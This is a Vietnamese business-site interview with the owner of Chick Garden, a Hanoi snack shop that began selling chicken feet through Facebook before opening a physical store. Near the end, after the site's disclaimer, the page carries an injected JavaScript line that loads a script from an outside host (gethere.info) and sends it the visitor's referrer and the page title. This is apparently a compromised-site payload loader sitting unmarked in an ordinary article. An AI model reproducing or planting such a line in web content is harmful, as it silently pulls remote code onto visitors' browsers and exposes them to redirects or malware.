Chick Garden – Chia sẻ con đường thành công từ mô hình kinh doanh đồ ăn online

Kinh doanh online giờ đã không còn xa lạ gì với tất cả mọi người, nhưng không phải ai cũng thành công. Câu chuyện của nhà hàng Chick Garden là một ví dụ điển hình cho sự thành công từ mô hình kinh doanh đồ ăn online và phát triển nó thành cửa hàng offline. 

chick-garden-2

Nguyễn Mạnh Thắng, ông chủ của Chick Garden

Hôm nay, kinhdoanhnhahang.vn may mắn được có cuộc trò chuyện cùng anh Nguyễn Mạnh Thắng, ông chủ 8x của Chick Garden để nghe anh chia sẻ về câu chuyện kinh doanh của mình.

Kinhdoanhnhahang.vn (KDNH): Cám ơn anh vì đã đồng ý thực hiện buổi phỏng vấn ngày hôm nay. Đầu tiên, anh có thể giới thiệu một chút về bản thân và về Chick Garden được không?

Anh Nguyễn Mạnh Thắng (NMT): Ý tưởng mở quán bắt đầu từ vợ anh, khi đi ăn ở nhiều hàng chị thấy món chân gà ngâm sả ớt chua ngọt ngon nhưng không đảm bảo nên đã quyết định thử kinh doanh món này.

KDNH: Tại sao anh lại đặt tên quán là Chick Garden?

NMT: Tên quán là Chick Garden, Chick là viết tắt của chicken. Bởi vì bắt đầu kinh doanh từ món chân gà ngâm sả ớt chua ngọt và sau này cũng muốn phát triển các món ăn vặt từ gà nên anh chị đã quyết định lấy tên quán là Chick Garden.

chick-garden-1

Chick Garden bắt đầu từ kinh doanh đồ ăn online.

KDNH: Theo em được biết, quán mình ban đầu được mở với hình thức kinh doanh online, vậy tại sao anh/chị lại quyết định lựa chọn hình thức kinh doanh này và khi kinh doanh online đâu là khó khăn lớn nhất?

NMT: Khi mới đầu, bởi cả hai anh chị đều đi làm công sở và không có nhiều thời gian để mở cửa hàng offline nên anh chị quyết định chỉ kinh doanh trên facebook. Nhưng khi kinh doanh online có một vấn đề đó là không có địa điểm, vi vậy anh chị buộc phải bỏ nhiều công sức và chi phí vào quảng cáo facebook và đồ ăn bắt buộc phải có sức hấp dẫn thì mới thu hút được khách hàng. Bởi nếu đồ ăn không ổn không ngon dù chỉ một lần thôi thì họ cũng sẽ không quay lại nữa.

Khi kinh doanh online việc ship hàng cũng là một vấn đề quan trọng, bởi nếu không gọi được ship, ship lấy giá cao quá thì giá khi tới khách hàng sẽ bị đội lên. Anh đã lên tìm hiểu các nhóm ship hàng ở facebook và khi có khách hàng gọi anh sẽ lên nhóm và đăng tìm shipper và cách này cũng khá có hiệu quả.

KDNH: Khi kinh doanh qua mạng đối tượng mà quán hướng đến là những ai?

NMT: Anh sử dụng facebook để quảng cáo cho nhà hàng của mình vì vậy phải xác định được đối tượng, độ tuổi khách hàng thì mới có thể làm được và đối tượng mà anh hướng đến chính là các bạn trẻ từ 13-35 tuổi.

chick-garden

Từ kinh doanh online đến mở một quán ăn offline có rất nhiều khó khăn

KDNH: Tại sao anh lại quyết định chuyển từ hình thức kinh doanh online sang mở cửa hàng?

NMT: Sau khoảng gần 2 năm bán online, quán của anh đã có một lượng khách hàng ổn định và quay lại nhiều, khách hàng mới cũng đến, anh cảm thấy có thể mở rộng ra được và muốn mở rộng thì bắt buộc phải có một địa điểm cụ thể. Trước đây, nhiều khách hàng cũng thường hỏi địa chỉ quán, quán có chỗ ngồi không…và thời gian đó thì quán cũng chưa mở offline vì vậy cũng mất một lượng không ít khách hàng. Và anh quyết định đến thời điểm phải mở cửa hàng để có địa điểm cho khách hàng đến và nhớ tới quán của mình.

KDNH: Quá trình chuyển đổi hình thức kinh doanh này có gặp nhiều khó khăn không? Kinh doanh offline có khác nhiều so với khi quán còn kinh doanh online không?

NMT: Có rất nhiều khó khăn. Thứ nhất là mặt bằng, việc tìm mặt bằng phải mất một thời gian khá lớn, sau đó là chi phí thuê mặt bằng, sửa mặt bằng…Tiếp theo là chi phí nhân công, nguyên liệu…Nhưng đến bây giờ sau khoảng 3 tháng quán cũng đã bắt đầu đi vào hoạt động khá ổn định.

Mô hình kinh doanh nào cũng có ưu điểm và nhược điểm. Khi kinh doanh offline phải quan tâm đến rất nhiều vấn đề, doanh thu được bao nhiêu, khi trừ đi tất cả các chi phí cố định còn lại được bao nhiêu. Trong khi kinh doanh online không phải mất những chi phí đó mà chỉ tốn tiền quảng cáo. Nhưng ngược lại, tuy kinh doanh offline tốn kém hơn nhưng khách hàng sẽ nhớ đến quán của mình hơn cũng như nếu họ đến quán ngồi số tiền họ bỏ ra cũng có thể nhiều hơn và dễ dàng mở rộng ra hơn so với mô hình online.

KDNH: Dự định của anh về Chick Garden trong tương lai là gì?

NMT: Bây giờ có rất nhiều mô hình do các bạn trẻ làm chủ và mở ra thành chuỗi. Nhưng anh muốn xây dựng một mô hình bền vững và chất lượng rồi mới tính đến việc nhân rộng thành chuỗi.

KDNH: Anh có chia sẻ gì với các bạn trẻ bắt đầu kinh doanh và muốn khởi nghiệp bằng kinh doanh online?

NMT: Khi kinh doanh online các bạn cũng phải đầu tư thời gian công sức không kém so với kinh doanh offline. Ngoài ra, các bạn cần có một khoản chi phí cố định, ít nhất chi phí mỗi tháng trung bình quảng cáo cho facebook là 4 triệu thì trong nửa năm bạn cần 30 triệu để xoay vòng. Cuối cùng dù điều quan trọng nhất trong kinh doanh dù là kinh doanh nhà hàng hay bất cứ ngành nào thì chất lượng sản phẩm vẫn là điều cốt lõi.

Cám ơn anh vì buổi phỏng vấn thân mật ngày hôm nay. Chúc anh và Chick Garden luôn thành công trên con đường mình chọn.

 (Bài viết này được thực hiện bởi chuyên trang Kinhdoanhnhahang.vn, website chính thức và duy nhất cung cấp những kiến thức nhà hàng, bài học thành công của những chủ doanh nghiệp tại Hà Nội. Những quan điểm trong bài phỏng vấn thể hiện quan điểm riêng của khách mời, không phản ánh quan điểm của Kinhdoanhnhahang.vn).

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận

Page 1 of 11